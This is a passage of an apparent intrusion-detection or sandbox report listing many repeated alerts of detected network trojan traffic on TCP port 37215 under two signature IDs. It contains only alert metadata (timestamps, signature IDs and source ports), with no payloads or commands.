                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530563
                  SID:2835222
                  Source Port:60998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528182
                  SID:2829579
                  Source Port:57396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785691
                  SID:2835222
                  Source Port:50980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299034
                  SID:2829579
                  Source Port:57704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586337
                  SID:2829579
                  Source Port:39532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810485
                  SID:2835222
                  Source Port:50206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912234
                  SID:2829579
                  Source Port:38132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798187
                  SID:2835222
                  Source Port:39604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799430
                  SID:2829579
                  Source Port:49078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598250
                  SID:2835222
                  Source Port:38166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788206
                  SID:2835222
                  Source Port:56458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659549
                  SID:2829579
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.589150
                  SID:2835222
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766272
                  SID:2829579
                  Source Port:48794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601730
                  SID:2829579
                  Source Port:55284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627827
                  SID:2829579
                  Source Port:45390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742310
                  SID:2829579
                  Source Port:55846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870951
                  SID:2835222
                  Source Port:50674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277325
                  SID:2835222
                  Source Port:38878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547320
                  SID:2829579
                  Source Port:39752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602437
                  SID:2835222
                  Source Port:32786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312563
                  SID:2835222
                  Source Port:53944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319464
                  SID:2835222
                  Source Port:44816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912835
                  SID:2835222
                  Source Port:51206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660578
                  SID:2829579
                  Source Port:60692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316235
                  SID:2829579
                  Source Port:59210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517522
                  SID:2829579
                  Source Port:43052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864791
                  SID:2829579
                  Source Port:33966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821083
                  SID:2829579
                  Source Port:43396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604747
                  SID:2829579
                  Source Port:56644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657636
                  SID:2835222
                  Source Port:46448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695152
                  SID:2835222
                  Source Port:47286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650326
                  SID:2829579
                  Source Port:39772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578910
                  SID:2829579
                  Source Port:56196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665346
                  SID:2835222
                  Source Port:40048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906692
                  SID:2835222
                  Source Port:45256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660545
                  SID:2829579
                  Source Port:48564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.592951
                  SID:2829579
                  Source Port:52350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738141
                  SID:2829579
                  Source Port:36750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.932584
                  SID:2829579
                  Source Port:46474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655664
                  SID:2829579
                  Source Port:43178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796877
                  SID:2829579
                  Source Port:44912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768766
                  SID:2835222
                  Source Port:33316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529254
                  SID:2835222
                  Source Port:40050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316498
                  SID:2829579
                  Source Port:51310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789489
                  SID:2829579
                  Source Port:52004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702152
                  SID:2829579
                  Source Port:59312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586393
                  SID:2835222
                  Source Port:37544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316596
                  SID:2835222
                  Source Port:47520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529694
                  SID:2829579
                  Source Port:38132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542783
                  SID:2829579
                  Source Port:37328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608635
                  SID:2829579
                  Source Port:34738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696142
                  SID:2835222
                  Source Port:52072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888254
                  SID:2835222
                  Source Port:54252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793542
                  SID:2835222
                  Source Port:44392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881229
                  SID:2829579
                  Source Port:41622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488140
                  SID:2829579
                  Source Port:48808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576161
                  SID:2829579
                  Source Port:48966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682922
                  SID:2829579
                  Source Port:39146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737853
                  SID:2835222
                  Source Port:38220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277334
                  SID:2835222
                  Source Port:50042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590429
                  SID:2835222
                  Source Port:45650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806398
                  SID:2829579
                  Source Port:33170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548624
                  SID:2829579
                  Source Port:43878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591347
                  SID:2835222
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785609
                  SID:2835222
                  Source Port:41592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595601
                  SID:2835222
                  Source Port:38986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661328
                  SID:2829579
                  Source Port:60734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742310
                  SID:2835222
                  Source Port:50346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846642
                  SID:2835222
                  Source Port:34532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583413
                  SID:2829579
                  Source Port:35726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886261
                  SID:2829579
                  Source Port:40656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491189
                  SID:2829579
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661182
                  SID:2829579
                  Source Port:38176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689566
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695305
                  SID:2829579
                  Source Port:55672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886830
                  SID:2829579
                  Source Port:40022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660557
                  SID:2829579
                  Source Port:52006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542652
                  SID:2829579
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859233
                  SID:2829579
                  Source Port:43626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602474
                  SID:2829579
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.890091
                  SID:2835222
                  Source Port:48210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887052
                  SID:2829579
                  Source Port:39906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629171
                  SID:2835222
                  Source Port:56940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577195
                  SID:2829579
                  Source Port:54424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660592
                  SID:2829579
                  Source Port:38094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629164
                  SID:2835222
                  Source Port:57926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312671
                  SID:2829579
                  Source Port:44512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627721
                  SID:2829579
                  Source Port:56656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908669
                  SID:2835222
                  Source Port:47052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.932520
                  SID:2829579
                  Source Port:48980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584138
                  SID:2829579
                  Source Port:48722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795495
                  SID:2829579
                  Source Port:49394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806007
                  SID:2829579
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766200
                  SID:2835222
                  Source Port:60404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661514
                  SID:2829579
                  Source Port:37456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.659394
                  SID:2829579
                  Source Port:55342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545853
                  SID:2829579
                  Source Port:41200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527974
                  SID:2835222
                  Source Port:53668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543229
                  SID:2835222
                  Source Port:53088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737946
                  SID:2829579
                  Source Port:39170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843703
                  SID:2829579
                  Source Port:45176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664862
                  SID:2829579
                  Source Port:36220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527234
                  SID:2829579
                  Source Port:38948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695267
                  SID:2835222
                  Source Port:35354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888629
                  SID:2829579
                  Source Port:42320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781010
                  SID:2835222
                  Source Port:53034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742608
                  SID:2829579
                  Source Port:52604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889469
                  SID:2835222
                  Source Port:58826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278874
                  SID:2829579
                  Source Port:34832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585266
                  SID:2829579
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678814
                  SID:2829579
                  Source Port:41160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312478
                  SID:2829579
                  Source Port:33320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495810
                  SID:2829579
                  Source Port:53438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483027
                  SID:2829579
                  Source Port:60128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531556
                  SID:2829579
                  Source Port:39054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664890
                  SID:2829579
                  Source Port:36766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790302
                  SID:2835222
                  Source Port:35188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696081
                  SID:2835222
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847591
                  SID:2829579
                  Source Port:54766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312671
                  SID:2829579
                  Source Port:49266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530023
                  SID:2829579
                  Source Port:40066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546488
                  SID:2829579
                  Source Port:46220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788321
                  SID:2829579
                  Source Port:44336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888306
                  SID:2835222
                  Source Port:43572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847566
                  SID:2835222
                  Source Port:34016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543215
                  SID:2835222
                  Source Port:42654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809990
                  SID:2829579
                  Source Port:52402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585210
                  SID:2829579
                  Source Port:35360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799501
                  SID:2829579
                  Source Port:39952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885935
                  SID:2835222
                  Source Port:57540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.761019
                  SID:2835222
                  Source Port:47932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737994
                  SID:2835222
                  Source Port:46260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577195
                  SID:2835222
                  Source Port:54424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847588
                  SID:2829579
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661512
                  SID:2829579
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.588028
                  SID:2835222
                  Source Port:53208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799349
                  SID:2829579
                  Source Port:38224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696122
                  SID:2829579
                  Source Port:43124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546533
                  SID:2835222
                  Source Port:56064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576812
                  SID:2835222
                  Source Port:59134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797140
                  SID:2829579
                  Source Port:52972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593965
                  SID:2829579
                  Source Port:50812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278836
                  SID:2829579
                  Source Port:35696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629095
                  SID:2829579
                  Source Port:54540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737994
                  SID:2829579
                  Source Port:53974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719096
                  SID:2829579
                  Source Port:57844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491363
                  SID:2829579
                  Source Port:37688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696142
                  SID:2829579
                  Source Port:52072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608653
                  SID:2835222
                  Source Port:41900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911286
                  SID:2829579
                  Source Port:34556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915800
                  SID:2835222
                  Source Port:53128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849144
                  SID:2829579
                  Source Port:36440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536736
                  SID:2835222
                  Source Port:37794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546557
                  SID:2835222
                  Source Port:60576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488634
                  SID:2829579
                  Source Port:53802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888014
                  SID:2829579
                  Source Port:36500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887304
                  SID:2835222
                  Source Port:42340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695634
                  SID:2835222
                  Source Port:59664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888394
                  SID:2829579
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371891
                  SID:2829579
                  Source Port:58032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796934
                  SID:2829579
                  Source Port:56622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737707
                  SID:2835222
                  Source Port:57178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682925
                  SID:2835222
                  Source Port:42800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547579
                  SID:2835222
                  Source Port:49144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788084
                  SID:2835222
                  Source Port:33104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.512062
                  SID:2835222
                  Source Port:41232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487858
                  SID:2835222
                  Source Port:46520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577774
                  SID:2829579
                  Source Port:44994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788939
                  SID:2835222
                  Source Port:59800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766269
                  SID:2829579
                  Source Port:58442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627977
                  SID:2835222
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578071
                  SID:2835222
                  Source Port:37774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765424
                  SID:2835222
                  Source Port:51096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585298
                  SID:2835222
                  Source Port:45412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295997
                  SID:2829579
                  Source Port:60390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689585
                  SID:2835222
                  Source Port:60732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678738
                  SID:2835222
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628982
                  SID:2829579
                  Source Port:53930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738112
                  SID:2829579
                  Source Port:59190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583318
                  SID:2835222
                  Source Port:54538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843731
                  SID:2835222
                  Source Port:50948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276857
                  SID:2829579
                  Source Port:58548
